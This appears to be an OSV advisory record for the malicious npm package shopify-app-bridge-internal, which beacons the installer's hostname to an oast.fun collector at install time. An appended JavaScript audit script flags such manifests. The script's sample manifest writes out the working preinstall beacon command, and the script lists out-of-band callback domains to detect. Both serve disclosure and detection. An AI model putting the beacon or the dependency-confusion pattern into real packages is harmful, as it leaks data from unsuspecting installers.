{"id":"MAL-2026-5452","summary":"Malicious code in shopify-app-bridge-internal (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9)\nThe package's `preinstall` lifecycle script in package.json runs unconditionally on `npm install` and issues an HTTPS GET to `https://jnhwbzedabyratvgvgpgo7wtsmhsiw8d4.oast.fun/?host=shopify-\u003chostname\u003e`, where `\u003chostname\u003e` is taken from `os.hostname()`. The `oast.fun` domain is a public out-of-band interaction service (interactsh) commonly used as a callback collector, so this beacon discloses the installer's machine hostname to a remote third party at install time. The package name `shopify-app-bridge-internal` (unscoped) with version `99.9.9` and an `internal` suffix is the canonical dependency-confusion shape against Shopify's official scoped `@shopify/app-bridge`, designed to be resolved by internal build systems that look up a private dep name against the public registry. 
Despite the package's self-description as a bug-bounty PoC, the install-time beacon harms any installer that resolves the name.\n","modified":"2026-06-09T18:01:37.630881493Z","published":"2026-06-09T17:18:39Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-09T17:18:39Z","import_time":"2026-06-09T17:45:49.236689192Z","versions":["99.9.9"],"source":"amazon-inspector","sha256":"b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9","id":"IN-MAL-2026-005017"},{"modified_time":"2026-06-09T17:18:40Z","source":"amazon-inspector","sha256":"f2a10e4151c578adc9a27ddc220cb2a1a9158ac747bf46476acd0d8670e580a2","import_time":"2026-06-09T17:45:49.2984212Z","versions":["99.9.9"],"id":"IN-MAL-2026-005018"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/shopify-app-bridge-internal/v/99.9.9"}],"affected":[{"package":{"name":"shopify-app-bridge-internal","ecosystem":"npm","purl":"pkg:npm/shopify-app-bridge-internal"},"versions":["99.9.9"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"f0322f748754ea6f1f3bf5d81856ba6b14dce567","sha512_sri":"sha512-CNXR5GW3GVwy/2BD+D7zR4YTo+O9Fqsjd/bUG35pkMd68uMAFbLUZcHXQdVdVlfolZ2N5bzCAp93Jf/AaziK/w=="},"filename":"shopify-app-bridge-internal-99.9.9.tgz"}],"evidence_files":[{"path":"package.json","sha256":"03f0ce38b08238a2a8630db417ba847bb5875a65efaee1e416ab6fdd626e1fb6","tlsh":"6ce061f00da5fa733dc105f64c07552ef153de0e0014a915abcb115941d57b6947da4c"}],"domains":["jnhwbzedabyratvgvgpgo7wtsmhsiw8d4.oast.fun"]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/shopify-app-bridge-internal/MAL-2026-5452.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}
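Added example (not part of the advisory record, and not code from the package or from Amazon Inspector): a static audit of a package manifest that flags the two properties the record describes, an install-time lifecycle script that beacons to an out-of-band collector with host information, and the unscoped `<org>-...-internal` / inflated-version shape of a dependency-confusion package. The package name, version and callback domain in the sample manifest are taken from the record; the preinstall command text, the OOB domain list, the `shopify` scope entry and the version cutoff are assumptions for illustration.

```javascript
"use strict";
// Added example: static audit of a package.json for install-time beacons and
// dependency-confusion shape. Not from the advisory; see the lead-in for what
// is taken from the record and what is assumed.

// Lifecycle hooks npm runs on its own when the package is installed as a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Out-of-band interaction services commonly used as callback collectors.
// Assumption: a starter list; extend it with your own intel.
const OOB_SUFFIXES = [
  "oast.fun", "oast.me", "oast.pro", "oast.live", "oast.site", "oast.online",
  "interact.sh", "oastify.com", "burpcollaborator.net",
];

// Organisations whose public scope an unscoped look-alike name might shadow.
// Assumption: in practice this is your own list of internal package prefixes.
const KNOWN_SCOPES = ["shopify"];
const INTERNAL_SUFFIXES = ["-internal", "-private", "-corp", "-int"];

function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"`)]+/g) || [];
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return ""; }
}

function isOobHost(host) {
  return OOB_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Returns a list of findings; each carries a rule name and the evidence it matched.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};

  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    findings.push({ rule: "lifecycle-script", hook, evidence: cmd });
    for (const url of extractUrls(cmd)) {
      const host = hostOf(url);
      findings.push({ rule: isOobHost(host) ? "oob-beacon" : "network-in-script", hook, evidence: host });
    }
    // Host/identity collection that typically feeds such a beacon.
    if (/\bhostname\b|\bwhoami\b|\$USER\b|process\.env|os\.userInfo/.test(cmd)) {
      findings.push({ rule: "host-info-collection", hook, evidence: cmd });
    }
  }

  const name = String(manifest.name || "");
  if (!name.startsWith("@")) {
    for (const scope of KNOWN_SCOPES) {
      if (name === scope || name.startsWith(scope + "-")) {
        findings.push({ rule: "unscoped-lookalike", evidence: `${name} vs @${scope}/*` });
      }
    }
    for (const suffix of INTERNAL_SUFFIXES) {
      if (name.endsWith(suffix)) findings.push({ rule: "internal-suffix", evidence: suffix });
    }
  }
  // Dependency-confusion packages carry an inflated version so the public copy
  // wins resolution against the private one. Assumption: major >= 90 as the cutoff.
  const major = parseInt(String(manifest.version || "0").split(".")[0], 10);
  if (Number.isFinite(major) && major >= 90) {
    findings.push({ rule: "inflated-version", evidence: manifest.version });
  }
  return findings;
}

function verdict(findings) {
  const rules = new Set(findings.map((f) => f.rule));
  if (rules.has("oob-beacon") || (rules.has("lifecycle-script") && rules.has("host-info-collection"))) return "block";
  if (["network-in-script", "unscoped-lookalike", "inflated-version", "internal-suffix"].some((r) => rules.has(r))) return "review";
  return "allow";
}

// Constructed manifest mirroring the advisory: name, version and callback domain
// come from the record; the preinstall command text is an assumption.
const SAMPLE_MANIFEST = {
  name: "shopify-app-bridge-internal",
  version: "99.9.9",
  scripts: {
    preinstall: "node -e \"require('https').get('https://jnhwbzedabyratvgvgpgo7wtsmhsiw8d4.oast.fun/?host=shopify-' + require('os').hostname())\"",
  },
};

const sampleFindings = auditManifest(SAMPLE_MANIFEST);
for (const f of sampleFindings) console.log(`${f.rule.padEnd(22)} ${f.hook || "-"} ${f.evidence}`);
console.log("verdict:", verdict(sampleFindings));
```

The audit is a pre-install gate, not a substitute for disabling the attack surface: `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops the `preinstall` hook from running at all, and mapping each private scope to the private registry (`@scope:registry=...` in `.npmrc`) removes the public-registry fallback that dependency confusion relies on.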